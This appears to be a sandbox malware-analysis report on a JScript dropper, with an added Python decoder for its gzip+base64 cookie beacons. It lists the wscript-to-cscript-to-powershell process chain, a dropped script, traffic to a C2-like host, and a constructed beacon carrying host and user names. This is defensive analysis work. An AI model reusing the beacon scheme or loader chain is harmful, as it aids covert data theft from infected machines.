Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
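In every captured request the only outbound data rides in the Cookie header: five cookies sharing the prefix 6F48217DA8 with a numeric suffix (6F48217DA8, 6F48217DA81 ... 6F48217DA84), each a base64 string beginning with H4sI, which is the base64 encoding of the gzip magic bytes 1f 8b 08. The requests are plain GET / with a Chrome user agent and Connection: Close, and the two responses shown are Cloudflare 403 challenge pages (cf-mitigated: challenge), so no second stage came back in this run. The decoder below is an added example written for this page, not code from the report or the sample: it parses a raw HTTP/1.1 request, groups the cookies by their shared prefix and inflates each value separately, verifying the gzip trailer instead of aborting on it so that a value copied out of a report or cut short in a capture still yields whatever inflates. The request it parses is constructed; only the 6F48217DA84 value is copied verbatim from the capture above, and the other chunk contents are invented.

```python
import base64
import gzip
import struct
import zlib

# Copied from the captured request above; every other cookie value in this file
# is constructed for the example.
REAL_TAIL_COOKIE = "H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA=="


def pack_cookie(text: str) -> str:
    """gzip + base64, the encoding the observed cookie values use ('H4sI...')."""
    return base64.b64encode(gzip.compress(text.encode())).decode()


def gunzip_lenient(blob: bytes) -> tuple[bytes, bool]:
    """Inflate one gzip member by hand and return (payload, trailer_ok).

    gzip.decompress() raises on a CRC32/ISIZE mismatch; for beacons transcribed
    from a report or truncated in a capture we still want the inflated bytes,
    plus a flag saying whether the trailer verified.
    """
    if blob[:3] != b"\x1f\x8b\x08":
        raise ValueError("not a gzip member with a deflate payload")
    flg = blob[3]
    pos = 10                                    # ID1 ID2 CM FLG MTIME(4) XFL OS
    if flg & 0x04:                              # FEXTRA
        (xlen,) = struct.unpack_from("<H", blob, pos)
        pos += 2 + xlen
    for bit in (0x08, 0x10):                    # FNAME, FCOMMENT: NUL-terminated
        if flg & bit:
            pos = blob.index(b"\x00", pos) + 1
    if flg & 0x02:                              # FHCRC
        pos += 2
    inflater = zlib.decompressobj(-zlib.MAX_WBITS)   # raw deflate, no wrapper
    payload = inflater.decompress(blob[pos:]) + inflater.flush()
    trailer = inflater.unused_data[:8]          # CRC32 + ISIZE after the stream
    ok = False
    if len(trailer) == 8:
        crc, isize = struct.unpack("<II", trailer)
        ok = crc == zlib.crc32(payload) and isize == (len(payload) & 0xFFFFFFFF)
    return payload, ok


def decode_cookie(value: str) -> tuple[bytes, bool]:
    """base64 (tolerating stripped padding) -> gzip -> (bytes, trailer_ok)."""
    raw = base64.b64decode(value + "=" * (-len(value) % 4))
    return gunzip_lenient(raw)


def parse_beacon(raw_request: str) -> dict:
    """Extract host, user agent and the decoded cookie chunks from a raw request.

    Chunks are the cookies whose names start with the shortest cookie name
    (6F48217DA8 in the capture); each value is inflated on its own because each
    carries its own gzip header.
    """
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    base = min(cookies, key=len) if cookies else ""
    chunks = {}
    for name, value in cookies.items():
        if name.startswith(base):
            payload, ok = decode_cookie(value)
            chunks[name] = {"bytes": payload, "trailer_ok": ok}
    return {"method": method, "path": path,
            "host": headers.get("host"), "user_agent": headers.get("user-agent"),
            "cookie_base": base, "chunks": chunks}


# Constructed request in the shape of the captured beacons (GET /, Chrome 123 UA,
# Connection: Close, upstream data only in Cookie). Chunk contents are invented.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\r\n"
    "Cookie: 6F48217DA8=" + pack_cookie("COMPUTERNAME=DESKTOP-1;USERNAME=user")
    + "; 6F48217DA81=" + pack_cookie("wscript.exe\r\npowershell.exe\r\n")
    + "; 6F48217DA84=" + REAL_TAIL_COOKIE + "\r\n"
    "Host: www.shamara.de\r\n"
    "Connection: Close\r\n\r\n"
)

if __name__ == "__main__":
    beacon = parse_beacon(SAMPLE_REQUEST)
    print(beacon["host"], "|", beacon["user_agent"])
    for name, chunk in beacon["chunks"].items():
        print(name, "trailer_ok=%s" % chunk["trailer_ok"], chunk["bytes"][:80])
```

Run it against the full requests above by pasting one into SAMPLE_REQUEST with the headers split back onto CRLF-separated lines; the cookie values are what the report captured, so their inflated contents are the data this run sent to each of the three hosts. Chunks whose trailer_ok is False were either mangled in transcription or cut short in the capture and should be treated as partial.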
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://0.30000000000000004.com/
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
Source: wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/echarts/issues/14266
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jsperf.com/try-catch-performance-overhead
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://momentjs.com/
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe Process Stats: CPU usage > 49%
Source: is it legal to kill a peacock in california 93889.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal72.troj.expl.evad.winJS@13/9@3/3
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Insurance Negotiations.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxxrwmnz.m5k.ps1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
